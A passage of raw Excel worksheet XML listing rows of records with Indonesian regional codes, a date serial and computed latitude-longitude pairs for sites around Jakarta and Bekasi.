      <c r="F1093" t="s">
        <v>4104</v>
      </c>
      <c r="G1093" t="s">
        <v>4105</v>
      </c>
      <c r="H1093" t="s">
        <v>26</v>
      </c>
      <c r="I1093" t="s">
        <v>4106</v>
      </c>
      <c r="J1093" t="s">
        <v>3438</v>
      </c>
      <c r="L1093" t="s">
        <v>4107</v>
      </c>
      <c r="M1093">
        <v>3172090007</v>
      </c>
      <c r="N1093">
        <v>3172090</v>
      </c>
      <c r="O1093">
        <v>3172</v>
      </c>
      <c r="P1093">
        <v>31</v>
      </c>
      <c r="Q1093" t="s">
        <v>890</v>
      </c>
      <c r="R1093" t="s">
        <v>890</v>
      </c>
      <c r="S1093" t="s">
        <v>49</v>
      </c>
      <c r="T1093" t="s">
        <v>33</v>
      </c>
      <c r="U1093" s="5">
        <v>10689999</v>
      </c>
      <c r="V1093" s="5" t="s">
        <v>15467</v>
      </c>
      <c r="W1093" s="5">
        <v>-617978</v>
      </c>
      <c r="X1093" t="s">
        <v>19254</v>
      </c>
      <c r="Y1093" t="str">
        <f t="shared" si="17"/>
        <v>-6.17978,106.89999</v>
      </c>
    </row>
    <row r="1094" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1094">
        <v>108665</v>
      </c>
      <c r="B1094" s="1">
        <v>43885</v>
      </c>
      <c r="C1094">
        <v>1</v>
      </c>
      <c r="D1094" t="s">
        <v>22</v>
      </c>
      <c r="E1094" t="s">
        <v>23</v>
      </c>
      <c r="F1094" t="s">
        <v>4108</v>
      </c>
      <c r="H1094" t="s">
        <v>26</v>
      </c>
      <c r="I1094" t="s">
        <v>271</v>
      </c>
      <c r="J1094" t="s">
        <v>2627</v>
      </c>
      <c r="L1094" t="s">
        <v>4109</v>
      </c>
      <c r="M1094">
        <v>3216090001</v>
      </c>
      <c r="N1094">
        <v>3216090</v>
      </c>
      <c r="O1094">
        <v>3216</v>
      </c>
      <c r="P1094">
        <v>32</v>
      </c>
      <c r="Q1094" t="s">
        <v>334</v>
      </c>
      <c r="R1094" t="s">
        <v>335</v>
      </c>
      <c r="S1094" t="s">
        <v>41</v>
      </c>
      <c r="T1094" t="s">
        <v>42</v>
      </c>
      <c r="U1094" s="5">
        <v>10701608</v>
      </c>
      <c r="V1094" s="5" t="s">
        <v>15468</v>
      </c>
      <c r="W1094" s="5">
        <v>-617912</v>
      </c>
      <c r="X1094" t="s">
        <v>19255</v>
      </c>
      <c r="Y1094" t="str">
        <f t="shared" si="17"/>
        <v>-6.17912,107.01608</v>
      </c>
    </row>
    <row r="1095" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1095">
        <v>108666</v>
      </c>
      <c r="B1095" s="1">
        <v>43885</v>
      </c>
      <c r="C1095">
        <v>1</v>
      </c>
      <c r="D1095" t="s">
        <v>22</v>
      </c>
      <c r="E1095" t="s">
        <v>23</v>
      </c>
      <c r="F1095" t="s">
        <v>4110</v>
      </c>
      <c r="H1095" t="s">
        <v>26</v>
      </c>
      <c r="I1095" t="s">
        <v>1891</v>
      </c>
      <c r="J1095" t="s">
        <v>2627</v>
      </c>
      <c r="L1095" t="s">
        <v>3192</v>
      </c>
      <c r="M1095">
        <v>3216081009</v>
      </c>
      <c r="N1095">
        <v>3216081</v>
      </c>
      <c r="O1095">
        <v>3216</v>
      </c>
      <c r="P1095">
        <v>32</v>
      </c>
      <c r="Q1095" t="s">
        <v>4111</v>
      </c>
      <c r="R1095" t="s">
        <v>2512</v>
      </c>
      <c r="S1095" t="s">
        <v>41</v>
      </c>
      <c r="T1095" t="s">
        <v>42</v>
      </c>
      <c r="U1095" s="5">
        <v>10706289</v>
      </c>
      <c r="V1095" s="5" t="s">
        <v>15469</v>
      </c>
      <c r="W1095" s="5">
        <v>-622039</v>
      </c>
      <c r="X1095" t="s">
        <v>19256</v>
      </c>
      <c r="Y1095" t="str">
        <f t="shared" si="17"/>
        <v>-6.22039,107.06289</v>
      </c>
    </row>
    <row r="1096" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1096">
        <v>108667</v>
      </c>
      <c r="B1096" s="1">
        <v>43885</v>
      </c>
      <c r="C1096">
        <v>1</v>
      </c>
      <c r="D1096" t="s">
        <v>22</v>
      </c>
      <c r="E1096" t="s">
        <v>23</v>
      </c>
      <c r="F1096" t="s">
        <v>4112</v>
      </c>
      <c r="G1096" t="s">
        <v>4113</v>
      </c>
      <c r="H1096" t="s">
        <v>26</v>
      </c>
      <c r="I1096" t="s">
        <v>76</v>
      </c>
      <c r="J1096" t="s">
        <v>2627</v>
      </c>
      <c r="L1096" t="s">
        <v>4114</v>
      </c>
      <c r="M1096">
        <v>3275060003</v>
      </c>
      <c r="N1096">
        <v>3275060</v>
      </c>
      <c r="O1096">
        <v>3275</v>
      </c>
      <c r="P1096">
        <v>32</v>
      </c>
      <c r="Q1096" t="s">
        <v>146</v>
      </c>
      <c r="R1096" t="s">
        <v>114</v>
      </c>
      <c r="S1096" t="s">
        <v>41</v>
      </c>
      <c r="T1096" t="s">
        <v>42</v>
      </c>
      <c r="U1096" s="5">
        <v>10697045</v>
      </c>
      <c r="V1096" s="5" t="s">
        <v>15470</v>
      </c>
      <c r="W1096" s="5">
        <v>-622595</v>
      </c>
      <c r="X1096" t="s">
        <v>19257</v>
      </c>
      <c r="Y1096" t="str">
        <f t="shared" si="17"/>
        <v>-6.22595,106.97045</v>
      </c>
    </row>
    <row r="1097" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1097">
        <v>108668</v>
      </c>
      <c r="B1097" s="1">
        <v>43885</v>
      </c>
      <c r="C1097">
        <v>1</v>
      </c>
      <c r="D1097" t="s">
        <v>22</v>
      </c>
      <c r="E1097" t="s">
        <v>23</v>
      </c>
      <c r="F1097" t="s">
        <v>4115</v>
      </c>
      <c r="H1097" t="s">
        <v>26</v>
      </c>
      <c r="I1097" t="s">
        <v>1240</v>
      </c>
      <c r="J1097" t="s">
        <v>2627</v>
      </c>
      <c r="L1097" t="s">
        <v>4116</v>
      </c>
      <c r="M1097">
        <v>3275010008</v>
      </c>
      <c r="N1097">
        <v>3275010</v>
      </c>
      <c r="O1097">
        <v>3275</v>
      </c>
      <c r="P1097">
        <v>32</v>
      </c>
      <c r="Q1097" t="s">
        <v>2236</v>
      </c>
      <c r="R1097" t="s">
        <v>287</v>
      </c>
      <c r="S1097" t="s">
        <v>41</v>
      </c>
      <c r="T1097" t="s">
        <v>42</v>
      </c>
      <c r="U1097" s="5">
        <v>10693696</v>
      </c>
      <c r="V1097" s="5" t="s">
        <v>15471</v>
      </c>
      <c r="W1097" s="5">
        <v>-627747</v>
      </c>
      <c r="X1097" t="s">
        <v>19258</v>
      </c>
      <c r="Y1097" t="str">
        <f t="shared" si="17"/>
        <v>-6.27747,106.93696</v>
      </c>
    </row>
    <row r="1098" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1098">
        <v>108669</v>
      </c>
      <c r="B1098" s="1">
        <v>43885</v>
      </c>
      <c r="C1098">
        <v>1</v>
      </c>
      <c r="D1098" t="s">
        <v>22</v>
      </c>
      <c r="E1098" t="s">
        <v>23</v>
      </c>
      <c r="F1098" t="s">
        <v>4117</v>
      </c>
      <c r="H1098" t="s">
        <v>26</v>
      </c>
      <c r="I1098" t="s">
        <v>4118</v>
      </c>
      <c r="J1098" t="s">
        <v>4119</v>
      </c>
      <c r="L1098" t="s">
        <v>4120</v>
      </c>
      <c r="M1098">
        <v>3172080001</v>
      </c>
      <c r="N1098">
        <v>3172080</v>
      </c>
      <c r="O1098">
        <v>3172</v>
      </c>
      <c r="P1098">
        <v>31</v>
      </c>
      <c r="Q1098" t="s">
        <v>48</v>
      </c>
      <c r="R1098" t="s">
        <v>141</v>
      </c>
      <c r="S1098" t="s">
        <v>49</v>
      </c>
      <c r="T1098" t="s">
        <v>33</v>
      </c>
      <c r="U1098" s="5">
        <v>10691132</v>
      </c>
      <c r="V1098" s="5" t="s">
        <v>15472</v>
      </c>
      <c r="W1098" s="5">
        <v>-621324</v>
      </c>
      <c r="X1098" t="s">
        <v>19259</v>
      </c>
      <c r="Y1098" t="str">
        <f t="shared" si="17"/>
        <v>-6.21324,106.91132</v>
      </c>
    </row>
    <row r="1099" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1099">
        <v>108670</v>
      </c>
      <c r="B1099" s="1">
        <v>43885</v>
      </c>
      <c r="C1099">
        <v>1</v>
      </c>
      <c r="D1099" t="s">
        <v>22</v>
      </c>
      <c r="E1099" t="s">
        <v>23</v>
      </c>
      <c r="F1099" t="s">
        <v>4121</v>
      </c>
      <c r="G1099" t="s">
        <v>4122</v>
      </c>
      <c r="H1099" t="s">
        <v>26</v>
      </c>
      <c r="I1099" t="s">
        <v>383</v>
      </c>
      <c r="J1099" t="s">
        <v>2627</v>
      </c>
      <c r="L1099" t="s">
        <v>4123</v>
      </c>
      <c r="M1099">
        <v>3275010008</v>
      </c>
      <c r="N1099">
        <v>3275010</v>
      </c>
      <c r="O1099">
        <v>3275</v>
      </c>
      <c r="P1099">
        <v>32</v>
      </c>
      <c r="Q1099" t="s">
        <v>2236</v>
      </c>
      <c r="R1099" t="s">
        <v>287</v>
      </c>
      <c r="S1099" t="s">
        <v>41</v>
      </c>
      <c r="T1099" t="s">
        <v>42</v>
      </c>
      <c r="U1099" s="5">
        <v>10693654</v>
      </c>
      <c r="V1099" s="5" t="s">
        <v>15442</v>
      </c>
      <c r="W1099" s="5">
        <v>-629077</v>
      </c>
      <c r="X1099" t="s">
        <v>19260</v>
      </c>
      <c r="Y1099" t="str">
        <f t="shared" si="17"/>
        <v>-6.29077,106.93654</v>
      </c>
    </row>
    <row r="1100" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1100">
        <v>108671</v>
      </c>
      <c r="B1100" s="1">
        <v>43885</v>
      </c>
      <c r="C1100">
        <v>1</v>
      </c>
      <c r="D1100" t="s">
        <v>22</v>
      </c>
      <c r="E1100" t="s">
        <v>23</v>
      </c>
      <c r="F1100" t="s">
        <v>4124</v>
      </c>
      <c r="H1100" t="s">
        <v>26</v>
      </c>
      <c r="I1100" t="s">
        <v>1971</v>
      </c>
      <c r="J1100" t="s">
        <v>2627</v>
      </c>
      <c r="L1100" t="s">
        <v>4125</v>
      </c>
      <c r="M1100">
        <v>3275010008</v>
      </c>
      <c r="N1100">
        <v>3275010</v>
      </c>
      <c r="O1100">
        <v>3275</v>
      </c>
      <c r="P1100">
        <v>32</v>
      </c>
      <c r="Q1100" t="s">
        <v>2236</v>
      </c>
      <c r="R1100" t="s">
        <v>287</v>
      </c>
      <c r="S1100" t="s">
        <v>41</v>
      </c>
      <c r="T1100" t="s">
        <v>42</v>
      </c>
      <c r="U1100" s="5">
        <v>10692481</v>
      </c>
      <c r="V1100" s="5" t="s">
        <v>15473</v>
      </c>
      <c r="W1100" s="5">
        <v>-628719</v>
      </c>
      <c r="X1100" t="s">
        <v>19261</v>
      </c>
      <c r="Y1100" t="str">
        <f t="shared" si="17"/>
        <v>-6.28719,106.92481</v>
      </c>
    </row>
    <row r="1101" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1101">
        <v>108672</v>
      </c>
      <c r="B1101" s="1">
        <v>43885</v>
      </c>
      <c r="C1101">
        <v>1</v>
      </c>
      <c r="D1101" t="s">
        <v>22</v>
      </c>
      <c r="E1101" t="s">
        <v>23</v>
      </c>
      <c r="F1101" t="s">
        <v>4126</v>
      </c>
      <c r="G1101" t="s">
        <v>4127</v>
      </c>
      <c r="H1101" t="s">
        <v>26</v>
      </c>
      <c r="I1101" t="s">
        <v>867</v>
      </c>
      <c r="J1101" t="s">
        <v>3135</v>
      </c>
      <c r="M1101">
        <v>3674060003</v>
      </c>
      <c r="N1101">
        <v>3674060</v>
      </c>
      <c r="O1101">
        <v>3674</v>
      </c>
      <c r="P1101">
        <v>36</v>
      </c>
      <c r="Q1101" t="s">
        <v>205</v>
      </c>
      <c r="R1101" t="s">
        <v>169</v>
      </c>
      <c r="S1101" t="s">
        <v>170</v>
      </c>
      <c r="T1101" t="s">
        <v>171</v>
      </c>
      <c r="U1101" s="5">
        <v>10670388</v>
      </c>
      <c r="V1101" s="5" t="s">
        <v>15474</v>
      </c>
      <c r="W1101" s="5">
        <v>-626568</v>
      </c>
      <c r="X1101" t="s">
        <v>19262</v>
      </c>
      <c r="Y1101" t="str">
        <f t="shared" si="17"/>
        <v>-6.26568,106.70388</v>
      </c>
    </row>
    <row r="1102" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1102">
        <v>108673</v>
      </c>
      <c r="B1102" s="1">
        <v>43885</v>
      </c>
      <c r="C1102">
        <v>1</v>
      </c>
      <c r="D1102" t="s">
        <v>22</v>
      </c>
      <c r="E1102" t="s">
        <v>23</v>
      </c>
      <c r="F1102" t="s">
        <v>4128</v>
      </c>
      <c r="H1102" t="s">
        <v>26</v>
      </c>
      <c r="I1102" t="s">
        <v>1809</v>
      </c>
      <c r="J1102" t="s">
        <v>4129</v>
      </c>
      <c r="L1102" t="s">
        <v>4130</v>
      </c>
      <c r="M1102">
        <v>3172070007</v>
      </c>
      <c r="N1102">
        <v>3172070</v>
      </c>
      <c r="O1102">
        <v>3172</v>
      </c>
      <c r="P1102">
        <v>31</v>
      </c>
      <c r="Q1102" t="s">
        <v>3186</v>
      </c>
      <c r="R1102" t="s">
        <v>128</v>
      </c>
      <c r="S1102" t="s">
        <v>49</v>
      </c>
      <c r="T1102" t="s">
        <v>33</v>
      </c>
      <c r="U1102" s="5">
        <v>10691204</v>
      </c>
      <c r="V1102" s="5" t="s">
        <v>15475</v>
      </c>
      <c r="W1102" s="5">
        <v>-622376</v>
      </c>
      <c r="X1102" t="s">
        <v>19263</v>
      </c>
      <c r="Y1102" t="str">
        <f t="shared" si="17"/>
        <v>-6.22376,106.91204</v>
      </c>
    </row>
    <row r="1103" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1103">
        <v>108674</v>
      </c>
      <c r="B1103" s="1">
        <v>43885</v>
      </c>
      <c r="C1103">
        <v>1</v>
      </c>
      <c r="D1103" t="s">
        <v>22</v>
      </c>
      <c r="E1103" t="s">
        <v>23</v>
      </c>
      <c r="F1103" s="3" t="s">
        <v>4131</v>
      </c>
      <c r="G1103" t="s">
        <v>4132</v>
      </c>
      <c r="H1103" t="s">
        <v>26</v>
      </c>
      <c r="I1103" t="s">
        <v>2196</v>
      </c>
      <c r="J1103" t="s">
        <v>2627</v>
      </c>
      <c r="L1103" t="s">
        <v>4133</v>
      </c>
      <c r="M1103">
        <v>3275010008</v>
      </c>
      <c r="N1103">
        <v>3275010</v>
      </c>
      <c r="O1103">
        <v>3275</v>
      </c>
      <c r="P1103">
        <v>32</v>
      </c>
      <c r="Q1103" t="s">
        <v>2236</v>
      </c>
      <c r="R1103" t="s">
        <v>287</v>
      </c>
      <c r="S1103" t="s">
        <v>41</v>
      </c>
      <c r="T1103" t="s">
        <v>42</v>
      </c>
      <c r="U1103" s="5">
        <v>10692559</v>
      </c>
      <c r="V1103" s="5" t="s">
        <v>15476</v>
      </c>
      <c r="W1103" s="5">
        <v>-627399</v>
      </c>
      <c r="X1103" t="s">
        <v>19264</v>
      </c>
      <c r="Y1103" t="str">
        <f t="shared" si="17"/>
        <v>-6.27399,106.92559</v>
      </c>
    </row>
    <row r="1104" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1104">
        <v>108675</v>
      </c>
      <c r="B1104" s="1">
        <v>43885</v>
      </c>
      <c r="C1104">
        <v>1</v>
      </c>
      <c r="D1104" t="s">
        <v>22</v>
      </c>
      <c r="E1104" t="s">
        <v>23</v>
      </c>
      <c r="F1104" t="s">
        <v>4134</v>
      </c>
      <c r="H1104" t="s">
        <v>26</v>
      </c>
      <c r="I1104" t="s">
        <v>1809</v>
      </c>
      <c r="J1104" t="s">
        <v>1100</v>
      </c>
      <c r="L1104" t="s">
        <v>4135</v>
      </c>
      <c r="M1104">
        <v>3172090007</v>
      </c>
      <c r="N1104">
        <v>3172090</v>
      </c>
      <c r="O1104">
        <v>3172</v>
      </c>
      <c r="P1104">
        <v>31</v>
      </c>
      <c r="Q1104" t="s">
        <v>890</v>
      </c>
      <c r="R1104" t="s">
        <v>890</v>
      </c>
      <c r="S1104" t="s">
        <v>49</v>
      </c>
      <c r="T1104" t="s">
        <v>33</v>
      </c>
      <c r="U1104" s="5">
        <v>10689650</v>
      </c>
      <c r="V1104" s="5" t="s">
        <v>15477</v>
      </c>
      <c r="W1104" s="5">
        <v>-617985</v>
      </c>
      <c r="X1104" t="s">
        <v>19265</v>
      </c>
      <c r="Y1104" t="str">
        <f t="shared" si="17"/>
        <v>-6.17985,106.89650</v>
      </c>
    </row>
    <row r="1105" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1105">
        <v>108676</v>
      </c>
      <c r="B1105" s="1">
        <v>43885</v>
      </c>
      <c r="C1105">
        <v>1</v>
      </c>
      <c r="D1105" t="s">
        <v>22</v>
      </c>
      <c r="E1105" t="s">
        <v>23</v>
      </c>
      <c r="F1105" t="s">
        <v>4136</v>
      </c>
      <c r="G1105" t="s">
        <v>4137</v>
      </c>
      <c r="H1105" t="s">
        <v>26</v>
      </c>
      <c r="I1105" t="s">
        <v>166</v>
      </c>
      <c r="J1105" t="s">
        <v>2627</v>
      </c>
      <c r="L1105" t="s">
        <v>4138</v>
      </c>
      <c r="M1105">
        <v>3216081001</v>
      </c>
      <c r="N1105">
        <v>3216081</v>
      </c>
      <c r="O1105">
        <v>3216</v>
      </c>
      <c r="P1105">
        <v>32</v>
      </c>
      <c r="Q1105" t="s">
        <v>1726</v>
      </c>
      <c r="R1105" t="s">
        <v>2512</v>
      </c>
      <c r="S1105" t="s">
        <v>41</v>
      </c>
      <c r="T1105" t="s">
        <v>42</v>
      </c>
      <c r="U1105" s="5">
        <v>10701991</v>
      </c>
      <c r="V1105" s="5" t="s">
        <v>15478</v>
      </c>
      <c r="W1105" s="5">
        <v>-626479</v>
      </c>
      <c r="X1105" t="s">
        <v>19135</v>
      </c>
      <c r="Y1105" t="str">
        <f t="shared" si="17"/>
        <v>-6.26479,107.01991</v>
      </c>
    </row>
    <row r="1106" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1106">
        <v>108677</v>
      </c>
      <c r="B1106" s="1">
        <v>43885</v>
      </c>
      <c r="C1106">
        <v>1</v>
      </c>
      <c r="D1106" t="s">
        <v>22</v>
      </c>
      <c r="E1106" t="s">
        <v>23</v>
      </c>
      <c r="F1106" t="s">
        <v>4139</v>
      </c>
      <c r="G1106" t="s">
        <v>4140</v>
      </c>
      <c r="H1106" t="s">
        <v>26</v>
      </c>
      <c r="I1106" t="s">
        <v>4141</v>
      </c>
      <c r="J1106" t="s">
        <v>4142</v>
      </c>
      <c r="L1106" t="s">
        <v>4143</v>
      </c>
      <c r="M1106">
        <v>3171040004</v>
      </c>
      <c r="N1106">
        <v>3171040</v>
      </c>
      <c r="O1106">
        <v>3171</v>
      </c>
      <c r="P1106">
        <v>31</v>
      </c>
      <c r="Q1106" t="s">
        <v>4144</v>
      </c>
      <c r="R1106" t="s">
        <v>163</v>
      </c>
      <c r="S1106" t="s">
        <v>108</v>
      </c>
      <c r="T1106" t="s">
        <v>33</v>
      </c>
      <c r="U1106" s="5">
        <v>10675969</v>
      </c>
      <c r="V1106" s="5" t="s">
        <v>15479</v>
      </c>
      <c r="W1106" s="5">
        <v>-623888</v>
      </c>
      <c r="X1106" t="s">
        <v>19266</v>
      </c>
      <c r="Y1106" t="str">
        <f t="shared" si="17"/>
        <v>-6.23888,106.75969</v>
      </c>
    </row>
    <row r="1107" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1107">
        <v>108678</v>
      </c>
      <c r="B1107" s="1">
        <v>43885</v>
      </c>
      <c r="C1107">
        <v>1</v>
      </c>
      <c r="D1107" t="s">
        <v>22</v>
      </c>
      <c r="E1107" t="s">
        <v>23</v>
      </c>
      <c r="F1107" t="s">
        <v>4145</v>
      </c>
      <c r="H1107" t="s">
        <v>26</v>
      </c>
      <c r="I1107" t="s">
        <v>555</v>
      </c>
      <c r="J1107" t="s">
        <v>2627</v>
      </c>
      <c r="L1107" t="s">
        <v>4146</v>
      </c>
      <c r="M1107">
        <v>3275010008</v>
      </c>
      <c r="N1107">
        <v>3275010</v>
      </c>
      <c r="O1107">
        <v>3275</v>
      </c>
      <c r="P1107">
        <v>32</v>
      </c>
      <c r="Q1107" t="s">
        <v>2236</v>
      </c>
      <c r="R1107" t="s">
        <v>287</v>
      </c>
      <c r="S1107" t="s">
        <v>41</v>
      </c>
      <c r="T1107" t="s">
        <v>42</v>
      </c>
      <c r="U1107" s="5">
        <v>10693782</v>
      </c>
      <c r="V1107" s="5" t="s">
        <v>15480</v>
      </c>
      <c r="W1107" s="5">
        <v>-628248</v>
      </c>
      <c r="X1107" t="s">
        <v>19267</v>
      </c>
      <c r="Y1107" t="str">
        <f t="shared" si="17"/>
        <v>-6.28248,106.93782</v>
      </c>
    </row>
    <row r="1108" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1108">
        <v>108679</v>
      </c>
      <c r="B1108" s="1">
        <v>43885</v>
      </c>
      <c r="C1108">
        <v>1</v>
      </c>
      <c r="D1108" t="s">
        <v>22</v>
      </c>
      <c r="E1108" t="s">
        <v>23</v>
      </c>
      <c r="F1108" t="s">
        <v>4147</v>
      </c>
      <c r="H1108" t="s">
        <v>26</v>
      </c>
      <c r="I1108" t="s">
        <v>443</v>
      </c>
      <c r="J1108" t="s">
        <v>2627</v>
      </c>
      <c r="L1108" t="s">
        <v>4148</v>
      </c>
      <c r="M1108">
        <v>3275010011</v>
      </c>
      <c r="N1108">
        <v>3275010</v>
      </c>
      <c r="O1108">
        <v>3275</v>
      </c>
      <c r="P1108">
        <v>32</v>
      </c>
      <c r="Q1108" t="s">
        <v>2389</v>
      </c>
      <c r="R1108" t="s">
        <v>287</v>
      </c>
      <c r="S1108" t="s">
        <v>41</v>
      </c>
      <c r="T1108" t="s">
        <v>42</v>
      </c>
      <c r="U1108" s="5">
        <v>10691623</v>
      </c>
      <c r="V1108" s="5" t="s">
        <v>15481</v>
      </c>
      <c r="W1108" s="5">
        <v>-626750</v>
      </c>
      <c r="X1108" t="s">
        <v>19268</v>
      </c>
      <c r="Y1108" t="str">
        <f t="shared" si="17"/>
        <v>-6.26750,106.91623</v>
      </c>
    </row>
    <row r="1109" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1109">
        <v>108680</v>
      </c>
      <c r="B1109" s="1">
        <v>43885</v>
      </c>
      <c r="C1109">
        <v>1</v>
      </c>
      <c r="D1109" t="s">
        <v>22</v>
      </c>
      <c r="E1109" t="s">
        <v>23</v>
      </c>
      <c r="F1109" t="s">
        <v>4149</v>
      </c>
      <c r="G1109" t="s">
        <v>4150</v>
      </c>
      <c r="H1109" t="s">
        <v>26</v>
      </c>
      <c r="I1109" t="s">
        <v>1624</v>
      </c>
      <c r="J1109" t="s">
        <v>4151</v>
      </c>
      <c r="M1109">
        <v>3172080003</v>
      </c>
      <c r="N1109">
        <v>3172080</v>
      </c>
      <c r="O1109">
        <v>3172</v>
      </c>
      <c r="P1109">
        <v>31</v>
      </c>
      <c r="Q1109" t="s">
        <v>2250</v>
      </c>
      <c r="R1109" t="s">
        <v>141</v>
      </c>
      <c r="S1109" t="s">
        <v>49</v>
      </c>
      <c r="T1109" t="s">
        <v>33</v>
      </c>
      <c r="U1109" s="5">
        <v>10694332</v>
      </c>
      <c r="V1109" s="5" t="s">
        <v>15482</v>
      </c>
      <c r="W1109" s="5">
        <v>-621537</v>
      </c>
      <c r="X1109" t="s">
        <v>19269</v>
      </c>
      <c r="Y1109" t="str">
        <f t="shared" si="17"/>
        <v>-6.21537,106.94332</v>
      </c>
    </row>
    <row r="1110" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1110">
        <v>108681</v>
      </c>
      <c r="B1110" s="1">
        <v>43885</v>
      </c>
      <c r="C1110">
        <v>1</v>
      </c>
      <c r="D1110" t="s">
        <v>22</v>
      </c>
      <c r="E1110" t="s">
        <v>23</v>
      </c>
      <c r="F1110" t="s">
        <v>4152</v>
      </c>
      <c r="H1110" t="s">
        <v>26</v>
      </c>
      <c r="I1110" t="s">
        <v>4153</v>
      </c>
      <c r="J1110" t="s">
        <v>4020</v>
      </c>
      <c r="L1110" t="s">
        <v>4154</v>
      </c>
      <c r="M1110">
        <v>3172050004</v>
      </c>
      <c r="N1110">
        <v>3172050</v>
      </c>
      <c r="O1110">
        <v>3172</v>
      </c>
      <c r="P1110">
        <v>31</v>
      </c>
      <c r="Q1110" t="s">
        <v>2717</v>
      </c>
      <c r="R1110" t="s">
        <v>358</v>
      </c>
      <c r="S1110" t="s">
        <v>49</v>
      </c>
      <c r="T1110" t="s">
        <v>33</v>
      </c>
      <c r="U1110" s="5">
        <v>10687450</v>
      </c>
      <c r="V1110" s="5" t="s">
        <v>15483</v>
      </c>
      <c r="W1110" s="5">
        <v>-629337</v>
      </c>
      <c r="X1110" t="s">
        <v>19270</v>
      </c>
      <c r="Y1110" t="str">
        <f t="shared" si="17"/>
        <v>-6.29337,106.87450</v>
      </c>
    </row>
    <row r="1111" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1111">
        <v>108682</v>
      </c>
      <c r="B1111" s="1">
        <v>43885</v>
      </c>
      <c r="C1111">
        <v>1</v>
      </c>
      <c r="D1111" t="s">
        <v>22</v>
      </c>
      <c r="E1111" t="s">
        <v>23</v>
      </c>
      <c r="F1111" t="s">
        <v>4155</v>
      </c>
      <c r="H1111" t="s">
        <v>26</v>
      </c>
      <c r="I1111" t="s">
        <v>2293</v>
      </c>
      <c r="J1111" t="s">
        <v>3077</v>
      </c>
      <c r="L1111" t="s">
        <v>250</v>
      </c>
      <c r="M1111">
        <v>3172040005</v>
      </c>
      <c r="N1111">
        <v>3172040</v>
      </c>
      <c r="O1111">
        <v>3172</v>
      </c>
      <c r="P1111">
        <v>31</v>
      </c>
      <c r="Q1111" t="s">
        <v>1351</v>
      </c>
      <c r="R1111" t="s">
        <v>281</v>
      </c>
      <c r="S1111" t="s">
        <v>49</v>
      </c>
      <c r="T1111" t="s">
        <v>33</v>
      </c>
      <c r="U1111" s="5">
        <v>10690708</v>
      </c>
      <c r="V1111" s="5" t="s">
        <v>15484</v>
      </c>
      <c r="W1111" s="5">
        <v>-625710</v>
      </c>
      <c r="X1111" t="s">
        <v>18292</v>
      </c>
      <c r="Y1111" t="str">
        <f t="shared" si="17"/>
        <v>-6.25710,106.90708</v>
      </c>
    </row>
    <row r="1112" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1112">
        <v>108683</v>
      </c>
      <c r="B1112" s="1">
        <v>43885</v>
      </c>
      <c r="C1112">
        <v>1</v>
      </c>
      <c r="D1112" t="s">
        <v>22</v>
      </c>
      <c r="E1112" t="s">
        <v>23</v>
      </c>
      <c r="F1112" t="s">
        <v>4156</v>
      </c>
      <c r="H1112" t="s">
        <v>26</v>
      </c>
      <c r="I1112" t="s">
        <v>2005</v>
      </c>
      <c r="J1112" t="s">
        <v>1711</v>
      </c>
      <c r="L1112" t="s">
        <v>4157</v>
      </c>
      <c r="M1112">
        <v>3175050001</v>
      </c>
      <c r="N1112">
        <v>3175050</v>
      </c>
      <c r="O1112">
        <v>3175</v>
      </c>
      <c r="P1112">
        <v>31</v>
      </c>
      <c r="Q1112" t="s">
        <v>1037</v>
      </c>
      <c r="R1112" t="s">
        <v>1013</v>
      </c>
      <c r="S1112" t="s">
        <v>547</v>
      </c>
      <c r="T1112" t="s">
        <v>33</v>
      </c>
      <c r="U1112" s="5">
        <v>10690642</v>
      </c>
      <c r="V1112" s="5" t="s">
        <v>15485</v>
      </c>
      <c r="W1112" s="5">
        <v>-614575</v>
      </c>
      <c r="X1112" t="s">
        <v>19271</v>
      </c>
      <c r="Y1112" t="str">
        <f t="shared" si="17"/>
        <v>-6.14575,106.90642</v>
      </c>
    </row>
    <row r="1113" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1113">
        <v>108684</v>
      </c>
      <c r="B1113" s="1">
        <v>43885</v>
      </c>
      <c r="C1113">
        <v>1</v>
      </c>
      <c r="D1113" t="s">
        <v>22</v>
      </c>
      <c r="E1113" t="s">
        <v>23</v>
      </c>
      <c r="F1113" t="s">
        <v>4158</v>
      </c>
      <c r="H1113" t="s">
        <v>26</v>
      </c>
      <c r="I1113" t="s">
        <v>166</v>
      </c>
      <c r="J1113" t="s">
        <v>3438</v>
      </c>
      <c r="L1113" t="s">
        <v>4159</v>
      </c>
      <c r="M1113">
        <v>3172090007</v>
      </c>
      <c r="N1113">
        <v>3172090</v>
      </c>
      <c r="O1113">
        <v>3172</v>
      </c>
      <c r="P1113">
        <v>31</v>
      </c>
      <c r="Q1113" t="s">
        <v>890</v>
      </c>
      <c r="R1113" t="s">
        <v>890</v>
      </c>
      <c r="S1113" t="s">
        <v>49</v>
      </c>
      <c r="T1113" t="s">
        <v>33</v>
      </c>
      <c r="U1113" s="5">
        <v>10690167</v>
      </c>
      <c r="V1113" s="5" t="s">
        <v>15486</v>
      </c>
      <c r="W1113" s="5">
        <v>-617932</v>
      </c>
      <c r="X1113" t="s">
        <v>19272</v>
      </c>
      <c r="Y1113" t="str">
        <f t="shared" si="17"/>
        <v>-6.17932,106.90167</v>
      </c>
    </row>
    <row r="1114" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1114">
        <v>108685</v>
      </c>
      <c r="B1114" s="1">
        <v>43885</v>
      </c>
      <c r="C1114">
        <v>1</v>
      </c>
      <c r="D1114" t="s">
        <v>22</v>
      </c>
      <c r="E1114" t="s">
        <v>23</v>
      </c>
      <c r="F1114" t="s">
        <v>4160</v>
      </c>
